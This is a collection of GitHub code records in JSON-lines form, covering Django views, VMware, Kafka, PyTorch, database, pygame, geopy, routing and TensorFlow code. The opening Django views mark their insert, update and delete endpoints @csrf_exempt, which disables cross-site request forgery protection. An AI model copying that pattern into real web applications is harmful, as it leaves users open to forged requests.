JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_list(request):\r\n mylist = DaoEmp().selectList()\r\n context = {\r\n 'list':mylist\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_detail(request):\r\n e_id = request.POST['e_id']\r\n #id = json.loads(request.body)\r\n emp = DaoEmp().selectOne(e_id)\r\n context = {\r\n 'emp' : 
emp\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_update(request):\r\n e_id = request.POST['e_id']\r\n e_name = request.POST['e_name']\r\n sex = request.POST['sex']\r\n addr = request.POST['addr']\r\n res = DaoEmp().update(e_id, e_name, sex, addr)\r\n context = {\r\n 'res':res\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_insert(request):\r\n e_id = request.POST['e_id']\r\n e_name = request.POST['e_name']\r\n sex = request.POST['sex']\r\n addr = request.POST['addr']\r\n res = DaoEmp().insert(e_id, e_name, sex, addr)\r\n context = {\r\n 'res':res\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_del(request):\r\n e_id = request.POST['e_id']\r\n res = DaoEmp().delete(e_id)\r\n context = {\r\n 'res':res\r\n }\r\n return JsonResponse(context)\r\n","repo_name":"hyungeunShin/Python-Practice","sub_path":"Django_MVVM/Django_MVVM/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38422469331","text":"import atexit\nimport sys\nimport re\nfrom datetime import datetime\nfrom logging import getLogger, Formatter, StreamHandler, CRITICAL, WARNING, INFO, DEBUG\nlogger = getLogger(__name__)\n\nfrom pyVim import connect\nfrom pyVmomi import vmodl\nfrom pyVmomi import vim\nimport pytz\n\nfrom tools import cli, get\n\ndef setup_args():\n parser = cli.build_arg_parser()\n\n parser.add_argument('-V', '--vmhost',\n required=True,\n action='append',\n help='VMhost names')\n\n parser.add_argument('--verbose',\n action='store_true',\n default=False,\n help='Verbose mode(default: False)')\n\n parser.add_argument('--timezone',\n required=False,\n default='Asia/Tokyo',\n help='Default time zone (Asia/Tokyo)')\n\n return cli.prompt_for_password(parser.parse_args())\n\ndef print_vm_info(virtual_machine):\n summary = virtual_machine.summary\n output = \"View virtual machime summary\" \\\n + \"\\n Name : \" + summary.config.name \\\n + \"\\n Template : \" + str(summary.config.template) \\\n + \"\\n Path : \" + summary.config.vmPathName \\\n + \"\\n Guest : \" + summary.config.guestFullName \\\n + \"\\n Instance UUID : \" + summary.config.instanceUuid \\\n + \"\\n Bios UUID : \" + summary.config.uuid \\\n + \"\\n CPU Num : \" + str(summary.config.numCpu) \\\n + \"\\n Memory Size : \" + str(summary.config.memorySizeMB) + \" MB\"\n annotation = summary.config.annotation\n if annotation:\n output = output + \"\\n Annotation : \" + annotation\n\n output = output + \"\\n State : \" + summary.runtime.powerState\n if summary.guest is not None:\n ip_address = summary.guest.ipAddress\n tools_version = summary.guest.toolsStatus\n if tools_version is not None:\n output = output + \"\\n VMware-tools : \" + tools_version\n else:\n output = output + \"\\n Vmware-tools : None\"\n if ip_address:\n output = output + \"\\n Ip address : \" + ip_address\n else:\n output = output + \"\\n Ip address : None\"\n if summary.runtime.question is not None:\n output = output + \"\\n Question : \" + summary.runtime.question.text\n logger.debug(output)\n\ndef main():\n args = setup_args()\n exit_status = 0\n\n # logger setting\n formatter = Formatter('[%(asctime)s]%(levelname)s - %(message)s')\n #formatter = Formatter('[%(asctime)s][%(funcName)s:%(lineno)d]%(levelname)s - %(message)s')\n logger.setLevel(DEBUG) # debug 固定\n\n console = StreamHandler()\n if hasattr(args, 'verbose') and args.verbose == True:\n console.setLevel(DEBUG)\n 
else:\n console.setLevel(INFO)\n console.setFormatter(formatter)\n logger.addHandler(console)\n\n try:\n if args.disable_ssl_verification:\n service_instance = connect.SmartConnectNoSSL(host=args.host,\n user=args.user,\n pwd=args.password,\n port=int(args.port))\n else:\n service_instance = connect.SmartConnect(host=args.host,\n user=args.user,\n pwd=args.password,\n port=int(args.port))\n\n if not service_instance:\n logger.critical(\"Could not connect to the specified host ' \\\n 'using specified username and password\")\n sys.exit(1)\n\n atexit.register(connect.Disconnect, service_instance)\n\n content = service_instance.RetrieveContent()\n\n # VM List作成\n vm_list = get.get_vms_by_names(content, args.vmhost)\n if len(vm_list) == 0:\n logger.warning('Virtual Machine is not found')\n sys.exit(1)\n\n summary = vm_list[0].summary\n if summary.guest is not None:\n print(summary.guest.ipAddress, end='')\n else:\n logger.warning('Ip address is not found')\n sys.exit(3)\n\n except vmodl.MethodFault as ex:\n logger.critical('Caught vmodl fault : ' + ex.msg)\n import traceback\n traceback.print_exc()\n sys.exit(253)\n\n except Exception as ex:\n logger.critical('Caught exception : ' + str(ex))\n import traceback\n traceback.print_exc()\n sys.exit(254)\n\n sys.exit(exit_status)\n\n# Start program\nif __name__ == \"__main__\":\n main()\n","repo_name":"h-mineta/vmware-pyvmomi-tools","sub_path":"get_machie_ipaddress.py","file_name":"get_machie_ipaddress.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38630524535","text":"def longestPeak(array):\n # Write your code here.\n longest_peak = 0\n for i in range(1,len(array)-1):\n # find the peak\n if array[i] > array[i-1] and array[i] > array[i+1]:\n # get left side length\n j=i-1\n while j >0 and array[j] > array[j-1]:\n j-=1\n # get right side length\n k=i+1\n while k < len(array)-1 and array[k] > array[k+1]:\n k+=1\n longest_peak = max(longest_peak,k-j+1)\n return longest_peak","repo_name":"narendra-devireddy/ds_and_algorithms","sub_path":"algoexpert/longest_peak.py","file_name":"longest_peak.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3236497221","text":"from pykafka import KafkaClient\nimport json\nimport os\nimport sys\n\n\nclass PyKafkaConsumer:\n def __init__(self, config_dict):\n self.config_dict = config_dict\n self.bootstrap_servers = self.config_dict[\"bootstrap_servers\"] # kafka bootstrap server\n self.topic = bytes(self.config_dict['topics'])\n\n def consume_from_kafka(self):\n kafka_client = KafkaClient(hosts=self.bootstrap_servers)\n topic = kafka_client.topics[self.topic]\n consumer = topic.get_simple_consumer()\n for msg in consumer:\n if msg is not None:\n print(json.loads(msg.value))\n\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], \"r\") as fd:\n config_dict = json.load(fd)\n py_kafka_consumer = PyKafkaConsumer(config_dict['kafka']['output'])\n py_kafka_consumer.consume_from_kafka()\n","repo_name":"smps92/smps-code","sub_path":"utils/kafka_consumer.py","file_name":"kafka_consumer.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22640053293","text":"import numpy as np\nimport scipy.stats.stats as sciStats\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport logging\n\n\nfrom 
volsim.params import *\n\nclass CorrelationLoss(nn.modules.loss._Loss):\n def __init__(self, params:Params, useGPU:bool):\n super(CorrelationLoss, self).__init__()\n self.useGPU = useGPU\n if useGPU:\n self.epsilon = torch.tensor(0.0000001).cuda()\n else:\n self.epsilon = torch.tensor(0.0000001)\n self.params = params\n self.corHistoryMode = params.corHistoryMode\n self.weightMSE = params.lossFacMSE\n self.weightRelMSE = params.lossFacRelMSE\n self.weightPearsonCorr = params.lossFacPearsonCorr\n self.weightSlConvReg = params.lossFacSlConvReg\n self.weightSizeReg = params.lossFacSizeReg\n self.sizeRegExp = params.lossSizeExp\n self.useOnlineMean = params.lossOnlineMean\n self.aggregateCorr = params.lossCorrAggregate\n\n self.resetCorrAcc()\n\n self.stepHist = np.zeros(6)\n self.stepHistCount = 0\n\n self.lastSampleSliceCorr = 0\n self.epochHist = {\"pred\":[], \"targ\":[], \"path\":[], \"enstd\":[], \"tempPred\":[], \"tempTarg\":[], \"tempPath\":[], \"tempEnstd\":[]}\n\n # has to be called after all simulation pairs of one sample are processed\n # to ensure correct loss computation for next sample \n def resetCorrAcc(self):\n self.accX = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.accY = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.count = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.accFinal = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.countFinal = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.accX.requires_grad = False\n self.accY.requires_grad = False\n self.count.requires_grad = False\n self.accFinal.requires_grad = False\n self.countFinal.requires_grad = False\n\n\n def forward(self, prediction:torch.Tensor, target:torch.Tensor, path:np.ndarray) -> torch.Tensor:\n if self.useGPU:\n prediction = prediction.cuda()\n target = target.cuda()\n\n corr = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n correlation = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n # pearson correlation\n if self.weightPearsonCorr > 0:\n corr = self.pearsonCorrOnline(prediction, target)\n self.lastSampleSliceCorr = torch.mean(corr).item()\n correlation = self.weightPearsonCorr * 0.5 * (1-corr)\n\n # mse\n l2 = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n if self.weightMSE > 0:\n l2 = self.weightMSE * self.distanceL2(prediction, target)\n\n # relative mse\n relL2 = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n if self.weightRelMSE > 0:\n predMean = self.accX.detach() / self.count.detach()\n targMean = self.accY.detach() / self.count.detach()\n relL2 = self.weightRelMSE * self.distanceL2(prediction-predMean, target-targMean)\n\n # size regularization\n sizeReg = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n if self.weightSizeReg > 0:\n temp = torch.where(prediction > 1, torch.pow(prediction-1, self.sizeRegExp), torch.zeros_like(prediction))\n sizeReg = self.weightSizeReg * torch.sum(temp, dim=1)\n\n # step history\n self.stepHist = self.stepHist + np.array([\n torch.mean(l2+relL2+correlation+sizeReg).item(),\n torch.mean(l2).item(),\n torch.mean(correlation).item(),\n torch.mean(corr).item(),\n torch.mean(relL2).item(),\n torch.mean(sizeReg).item(),\n ])\n self.stepHistCount = self.stepHistCount + 1\n\n # epoch history\n self.epochHist[\"tempPred\"] += [prediction.cpu().detach().numpy()]\n self.epochHist[\"tempTarg\"] += [target.cpu().detach().numpy()]\n 
self.epochHist[\"tempPath\"] += [np.repeat(path[:,None], target.shape[1], axis=1)]\n\n result = torch.mean(l2 + relL2 + correlation + sizeReg)\n if torch.isnan(result):\n logging.error(\"NAN in loss!\")\n logging.error(\"L2 \" + str(l2))\n logging.error(\"Rel L2 \" + str(relL2))\n logging.error(\"Corr \" + str(corr))\n logging.error(\"Correlation \" + str(correlation))\n raise ValueError(\"NAN in loss!\")\n return result\n\n\n def updateMeanAccs(self, x:torch.Tensor, y:torch.Tensor):\n if self.useGPU:\n x = x.cuda()\n y = y.cuda()\n\n self.count = self.count + x.shape[1]\n self.accX = self.accX + torch.sum(x, dim=1, keepdim=True)\n self.accY = self.accY + torch.sum(y, dim=1, keepdim=True)\n\n\n def pearsonCorrOnline(self, x:torch.Tensor, y:torch.Tensor) -> torch.Tensor:\n if self.useOnlineMean:\n self.updateMeanAccs(x, y)\n\n if self.count <= 1:\n return torch.zeros_like(self.accFinal)\n\n meanX = self.accX.detach() / self.count.detach()\n meanY = self.accY.detach() / self.count.detach()\n xm = x - meanX\n ym = y - meanY\n rNum = torch.sum(xm*ym, dim=1, keepdim=True) #manual dot product\n rDen = torch.norm(xm, 2, dim=1, keepdim=True) * torch.norm(ym, 2, dim=1, keepdim=True)\n rVal = rNum / torch.max(rDen, self.epsilon) #epsilon for numerical stability\n\n if any(torch.isnan(rVal)):\n logging.error(\"NAN in correlation computation!\")\n logging.error(\"x \" + str(x))\n logging.error(\"y \" + str(y))\n logging.error(\"accX \" + str(self.accX))\n logging.error(\"accY \" + str(self.accY))\n logging.error(\"count \" + str(self.count))\n logging.error(\"meanX \" + str(meanX))\n logging.error(\"meanY \" + str(meanY))\n logging.error(\"rNum \" + str(rNum))\n logging.error(\"rDen \" + str(rDen))\n logging.error(\"rVal \" + str(rVal))\n raise ValueError(\"NAN in correlation computation!\")\n\n if self.aggregateCorr:\n # average over previous pairs from same sample for better stability\n self.accFinal = self.accFinal.detach() + rVal\n self.countFinal = self.countFinal.detach() + 1\n return self.accFinal / self.countFinal\n else:\n return rVal\n\n\n def getStepHistory(self) -> np.ndarray:\n result = self.stepHist / self.stepHistCount\n self.stepHist = np.zeros(6)\n self.stepHistCount = 0\n self.resetCorrAcc()\n\n # normalize all step distances to [0.1, 1.0]\n predStep = np.concatenate(self.epochHist[\"tempPred\"], axis=1) #[3,55]\n dMax = np.max(predStep, axis=1, keepdims=True) #[3,1]\n dMin = np.min(predStep, axis=1, keepdims=True) #[3,1]\n if (dMin == dMax).all():\n predStep = predStep - dMin + 0.1\n elif (dMin == dMax).any():\n for i in range(dMin.shape[0]):\n if dMin[i] == dMax[i]:\n predStep[i] = predStep[i] - dMin[i] + 0.1\n else:\n predStep[i] = 0.9 * ((predStep[i] - dMin[i]) / (dMax[i] - dMin[i])) + 0.1\n else:\n predStep = 0.9 * ((predStep - dMin) / (dMax - dMin)) + 0.1\n\n self.epochHist[\"pred\"] += [predStep]\n self.epochHist[\"targ\"] += [np.concatenate(self.epochHist[\"tempTarg\"], axis=1)]\n self.epochHist[\"path\"] += [np.concatenate(self.epochHist[\"tempPath\"], axis=1)]\n self.epochHist[\"tempPred\"] = []\n self.epochHist[\"tempTarg\"] = []\n self.epochHist[\"tempPath\"] = []\n return result\n\n def getEpochHistory(self, splits:dict=None) -> tuple:\n predEpoch = np.concatenate(self.epochHist[\"pred\"], axis=0)\n targEpoch = np.concatenate(self.epochHist[\"targ\"], axis=0)\n pathEpoch = np.concatenate(self.epochHist[\"path\"], axis=0)\n\n corrSplit = {}\n if splits:\n for split in splits:\n idx = np.core.defchararray.find(pathEpoch.astype(str), splits[split]) >= 0\n stacked = 
np.stack([predEpoch[idx], targEpoch[idx]])\n if self.corHistoryMode == \"pearson\":\n corr = np.corrcoef(stacked)[0,1]\n elif self.corHistoryMode == \"spearman\":\n corr, _ = sciStats.spearmanr(stacked.transpose((1,0)))\n else:\n raise ValueError(\"Invalid ground \")\n corrSplit[split] = corr\n\n stackedAll = np.stack([predEpoch.flatten(), targEpoch.flatten()])\n if self.corHistoryMode == \"pearson\":\n corrAll = np.corrcoef(stackedAll)[0,1]\n elif self.corHistoryMode == \"spearman\":\n corrAll, _ = sciStats.spearmanr(stackedAll.transpose((1,0)))\n else:\n raise ValueError(\"Invalid ground \")\n\n self.epochHist[\"pred\"] = []\n self.epochHist[\"targ\"] = []\n self.epochHist[\"path\"] = []\n return corrAll, corrSplit\n\n def distanceL2(self, x:torch.Tensor, y:torch.Tensor) -> torch.Tensor:\n return F.mse_loss(x, y, reduction='none')\n\n def distanceL1(self, x:torch.Tensor, y:torch.Tensor) -> torch.Tensor:\n return F.l1_loss(x, y, reduction='none')\n","repo_name":"tum-pbs/VOLSIM","sub_path":"src/volsim/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":9440,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"73"} +{"seq_id":"31904044838","text":"#import player\nfrom .player import Player\nfrom .round import Round\nfrom .helper import iterateZero\n\nclass Team:\n def initDB(cursor):\n Team.cur = cursor\n Team._createTeamTable()\n Team._createTeamPlayersTable()\n\n def initConnect(cursor):\n Team.cur = cursor\n\n def _createTeamTable():\n Team.cur.execute(\"\"\"DROP TABLE IF EXISTS team_list\"\"\")\n Team.cur.execute(\"\"\"CREATE TABLE team_list (\n team_id serial PRIMARY KEY,\n team_name VARCHAR(30) NOT NULL,\n team_color CHAR(6),\n round_id int)\"\"\")\n\n def _createTeamPlayersTable():\n Team.cur.execute(\"\"\"DROP TABLE IF EXISTS team_players\"\"\")\n Team.cur.execute(\"\"\"CREATE TABLE team_players (\n player_id int,\n team_id int,\n added timestamp DEFAULT statement_timestamp() )\"\"\")\n\n# modify teams\n def add(teamName, color, roundId):\n if not Round.existingId(roundId):\n print(\"Warning. Team\", teamName, \"not added, because roundId\", roundId, \"doesn't exist.\")\n return\n if not Team._getIdByName(teamName, roundId):\n Team.cur.execute(\"\"\"INSERT INTO team_list (team_name, round_id, team_color)\n VALUES (%s, %s, %s)\"\"\", (teamName, roundId, color))\n print(\"Team\", teamName, \"added to round\", Round.getName(roundId))\n return Team._getIdByName(teamName, roundId)\n else:\n print(\"Warning! Team\", teamName, \"not added, it already exists.\")\n\n def addPlayer(playerId, teamId):\n if not Team.removePlayer(playerId, teamId):\n return\n Team.cur.execute(\"\"\"INSERT INTO team_players (player_id, team_id)\n VALUES (%s, %s)\"\"\", (playerId, teamId))\n print(Player.getNameById(playerId), \"added to team\", Team.getNameById(teamId))\n return True\n\n def removePlayer(playerId, teamId):\n roundId = Team._getRoundIdByTeamId(teamId)\n if not roundId:\n print(\"Warning. 
addPlayer() round or team did not exist\")\n return False\n oldTeamId = Team.getPlayerTeamId(playerId, roundId)\n if oldTeamId:\n Team.cur.execute(\"\"\"DELETE FROM team_players\n WHERE team_id = %s AND player_id = %s\"\"\", (oldTeamId, playerId))\n return True\n\n# gets\n def _getIdByName(teamName, roundId):\n Team.cur.execute(\"\"\"SELECT team_id\n FROM team_list\n WHERE round_id = %s AND team_name = %s\"\"\", (roundId, teamName))\n return iterateZero(Team.cur.fetchone())\n\n def getNameById(teamId):\n Team.cur.execute(\"\"\"SELECT team_name\n FROM team_list\n WHERE team_id = %s\"\"\", [teamId])\n return iterateZero(Team.cur.fetchone())\n\n def getColorById(teamId):\n Team.cur.execute(\"\"\"SELECT team_color\n FROM team_list\n WHERE team_id = %s\"\"\", [teamId])\n color = iterateZero(Team.cur.fetchone())\n if not color:\n return 'FFFFFF'\n return color\n\n def _getRoundIdByTeamId(teamId):\n Team.cur.execute(\"\"\"SELECT round_id\n FROM team_list\n WHERE team_id = %s\"\"\", [teamId])\n return iterateZero(Team.cur.fetchone())\n\n def getPlayerTeamId(playerId, roundId):\n Team.cur.execute(\"\"\"SELECT team_id\n FROM team_players\n WHERE player_id = %s AND team_id IN\n (SELECT team_id FROM team_list WHERE round_id = %s)\"\"\", (playerId, roundId))\n return iterateZero(Team.cur.fetchone())\n\n def getTeamlessPlayerIdList(roundId):\n teamlessPlayers = []\n for id in Player.getAllPlayerIds():\n if not Team.getPlayerTeamId(id, roundId):\n teamlessPlayers.append(id)\n return teamlessPlayers\n\n# get lists\n def getTeamPlayerIdList(teamId):\n Team.cur.execute(\"\"\"SELECT player_id\n FROM team_players\n WHERE team_id = %s\"\"\", [teamId])\n playerIds = Team.cur.fetchall()\n return sum(playerIds, ())\n\n def getTeamsIdList(roundId):\n Team.cur.execute(\"\"\"SELECT team_id\n FROM team_list\n WHERE round_id = %s\"\"\", [roundId])\n teamIds = Team.cur.fetchall()\n return sum(teamIds, ())\n\n","repo_name":"mahfiaz/spotter_irl","sub_path":"engine/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73362778475","text":"\"\"\"\nModules implements RESTful API for accessing the service\n\"\"\"\n\nimport uvicorn\n\nfrom . import (\n application,\n endpoints,\n models\n)\nfrom .application import (\n # app,\n add_quit_callback\n)\n\nfrom .. 
import log_utils\n\n# APP_PATH = \"app.api.application:app\"\n\n\ndef build_uvicorn_server(host=\"0.0.0.0\", port=8080) -> uvicorn.Server:\n \"\"\"\n Builds an ASGI server\n \"\"\"\n cfg = uvicorn.Config(\n application.app,\n host=host,\n port=port,\n log_level=log_utils.get_lib_log_level()\n )\n return uvicorn.Server(cfg)\n\n\nasync def start_server(server=None):\n \"\"\"\n Launches API server in the current async loop\n NOTE: by default uses uvicorn\n \"\"\"\n if server is None:\n server = build_uvicorn_server()\n await server.serve()\n","repo_name":"Booplicate/currency-service","sub_path":"app/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14602438199","text":"\"\"\"\nContains shared functions used between functions\n\"\"\"\nimport pygame\nfrom .assets import *\n\n\ndef draw_button(display: pygame.display, rect: pygame.Rect, button_txt: str, disabled=False, small_font=False):\n \"\"\"\n Draw button\n :param display: display to draw onto\n :param rect: size of button as rect\n :param button_txt: text of button\n :param disabled: if button should be disabled\n :param small_font: to use small font or not\n :return:\n \"\"\"\n if not disabled:\n outline = black\n fill = light_grey\n else:\n outline = black_transparent\n fill = light_grey_transparent\n if not small_font:\n font = bold_48_font\n else:\n font = regular_29_font\n text_width = font.get_rect(f\"{button_txt}\")[2]\n text_height = font.get_rect(f\"{button_txt}\")[3]\n text_x = (rect.x + (rect.width//2)) - (text_width // 2)\n text_y = (rect.y + (rect.height//2)) - (text_height // 2)\n pygame.draw.rect(display, fill, rect)\n pygame.draw.rect(display, outline, rect, 1)\n font.render_to(display, (text_x, text_y), f\"{button_txt}\", outline)\n\n","repo_name":"vlee489/AC31009-Client","sub_path":"classes/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2405214320","text":"from model.graph import (\n NId,\n)\nfrom syntax_graph.syntax_nodes.pair import (\n build_pair_node,\n)\nfrom syntax_graph.syntax_nodes.symbol_lookup import (\n build_symbol_lookup_node,\n)\nfrom syntax_graph.types import (\n SyntaxGraphArgs,\n)\nfrom utils.graph import (\n adj_ast,\n)\nfrom utils.graph.text_nodes import (\n node_to_str,\n)\n\n\ndef reader(args: SyntaxGraphArgs) -> NId:\n graph = args.ast_graph\n n_attrs = graph.nodes[args.n_id]\n key_id = n_attrs.get(\"label_field_key\")\n value_id = n_attrs.get(\"label_field_value\")\n if value_id and key_id:\n if graph.nodes[value_id][\"label_type\"] == \"block_node\":\n value_id = adj_ast(graph, value_id)[-1]\n return build_pair_node(args, key_id, value_id)\n\n symbol = node_to_str(graph, args.n_id)\n return build_symbol_lookup_node(args, symbol)\n","repo_name":"cognettings/vulscanner","sub_path":"skims/skims/syntax_graph/syntax_readers/yaml/block_mapping_pair.py","file_name":"block_mapping_pair.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"32843790882","text":"from unittest.mock import patch\n\nimport geopy.geocoders\nfrom geopy.geocoders import LiveAddress\nfrom test.geocoders.util import BaseTestGeocoder, env\n\n\nclass TestUnitLiveAddress:\n dummy_id = 'DUMMY12345'\n dummy_token = 'DUMMY67890'\n\n def 
test_user_agent_custom(self):\n geocoder = LiveAddress(\n auth_id=self.dummy_id,\n auth_token=self.dummy_token,\n user_agent='my_user_agent/1.0'\n )\n assert geocoder.headers['User-Agent'] == 'my_user_agent/1.0'\n\n @patch.object(geopy.geocoders.options, 'default_scheme', 'http')\n def test_default_scheme_is_ignored(self):\n geocoder = LiveAddress(auth_id=self.dummy_id, auth_token=self.dummy_token)\n assert geocoder.scheme == 'https'\n\n\nclass TestLiveAddress(BaseTestGeocoder):\n\n @classmethod\n def make_geocoder(cls, **kwargs):\n return LiveAddress(\n auth_id=env['LIVESTREETS_AUTH_ID'],\n auth_token=env['LIVESTREETS_AUTH_TOKEN'],\n **kwargs\n )\n\n async def test_geocode(self):\n await self.geocode_run(\n {\"query\": \"435 north michigan ave, chicago il 60611 usa\"},\n {\"latitude\": 41.890, \"longitude\": -87.624},\n )\n","repo_name":"geopy/geopy","sub_path":"test/geocoders/smartystreets.py","file_name":"smartystreets.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":4130,"dataset":"github-code","pt":"73"} +{"seq_id":"71135850157","text":"from bottle import route, run, template, request, response\nimport here\nimport json\n\n\n@route('/data/v1/route')\ndef index():\n options = []\n params = dict(request.query.decode())\n try:\n destination = params['destination']\n mylocation = params['location']\n koordinates = here.get_koordinates(destination)\n kilometers = here.get_km_car(mylocation, koordinates)[0]\n car = here.get_km_car(mylocation, koordinates)\n bike = here.get_route_bike(mylocation, koordinates)\n bus = here.get_route_bus(mylocation, koordinates)\n walk = here.get_route_walk(mylocation, koordinates)\n options.append({'name': 'car', 'kilometers': car[0], 'time': car[1],'trees':car[0]*122*10**(-3)/21})\n options.append({'name': 'bike', 'kilometers': bike[0], 'time': bike[1], 'trees':bike[0]*122*10**(-3)/21, 'cal': bike[0]*30})\n options.append({'name': 'walk', 'kilometers': walk[0], 'time': walk[1], 'trees':walk[0]*122*10**(-3)/21, 'cal': walk[0]*76})\n if bus:\n options.append({'name': 'bus',\n 'number': bus[0] + \" \" + bus[1],\n 'vstopna': bus[2],\n 'izstopna': bus[3],\n 'leaving_time': bus[4],\n 'arriving_time': bus[5],\n 'time': bus[6]})\n json_object = {'destination': destination,\n 'kilometers': kilometers,\n 'options': options}\n response.content_type = 'application/json'\n return json.dumps(json_object)\n except Exception as e:\n print(e)\n return 'Bad request'\n\n\nrun(host='localhost', port=8888)\n","repo_name":"tinaZwittnig/Carbonex","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"10052093378","text":"import shutil, os, glob\n\ndef exists_remove(path):\n if os.path.exists(path):\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.remove(path)\n return True\n return False\n\ndef make_clear_dir(path):\n exists_remove(path)\n os.mkdir(path)\n\ndef not_exists_mkdir(path):\n if not os.path.exists(path):\n os.mkdir(path)\n return True\n return False\n\n\nmake_clear_dir(\"dist/\")\n\nnot_exists_mkdir(\"test-Standalone/\") or exists_remove(\"test-Standalone/Geyser-roolback-for-mojang-login-Standalone.jar\")\n\n\nfor i in glob.glob(\"../Geyser-roolback-for-mojang-login/bootstrap/*/build/libs/Geyser-*\"):\n name_ends = i[i.rfind('-') : ]\n out_name = \"dist/Geyser-roolback-for-mojang-login\" + name_ends\n print(out_name)\n shutil.copy(i, out_name)\n if 
name_ends == \"-Standalone.jar\":\n shutil.copy(i, \"test-Standalone/Geyser-roolback-for-mojang-login-Standalone.jar\")\n\n\nprint(\"OK!\")\n","repo_name":"bddjr/Geyser-roolback-for-mojang-login-release-replicator","sub_path":"run_copy.py","file_name":"run_copy.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5019899624","text":"# Add to genetics.py file\n\nimport tensorflow as tf\nimport numpy as np\n\n\nclass Brain:\n def __init__(self, genome):\n self.genome = genome\n self.model = tf.keras.models.Sequential(\n [\n tf.keras.layers.Dense(10, activation=\"relu\"), # hidden layer 1\n tf.keras.layers.Dense(10, activation=\"relu\"), # hidden layer 2\n tf.keras.layers.Dense(4, activation=\"softmax\"), # output layer\n ]\n )\n\n # Explicitly build the model\n self.model.build((None, 8)) # input_shape: batch_size x number_of_input_neurons\n\n # Convert the genome to weights and biases\n weights, biases = self.genome_to_weights_and_biases()\n\n # Set the weights and biases\n self.model.set_weights(\n [weights[0], biases[0], weights[1], biases[1], weights[2], biases[2]]\n )\n\n def genome_to_weights_and_biases(self):\n # Convert genome into a list of weights and biases\n weights = []\n biases = []\n\n # Weights and biases for first layer\n weights.append(np.array(self.genome[:80]).reshape((8, 10)))\n biases.append(np.array(self.genome[80:90]))\n\n # Weights and biases for second layer\n weights.append(np.array(self.genome[90:190]).reshape((10, 10)))\n biases.append(np.array(self.genome[190:200]))\n\n # Weights and biases for output layer\n weights.append(np.array(self.genome[200:240]).reshape((10, 4)))\n biases.append(np.array(self.genome[240:]))\n\n return weights, biases\n\n def decide(self, inputs):\n inputs = np.array(inputs)[np.newaxis, ...] # add batch dimension\n outputs = self.model.predict(inputs)[0] # remove batch dimension\n return np.argmax(outputs)\n","repo_name":"nickwoods2/hinterwelt","sub_path":"src/genetics.py","file_name":"genetics.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1913748704","text":"from spack.package import *\n\n\nclass PyMultiqc(PythonPackage):\n \"\"\"MultiQC is a tool to aggregate bioinformatics results across many\n samples into a single report. 
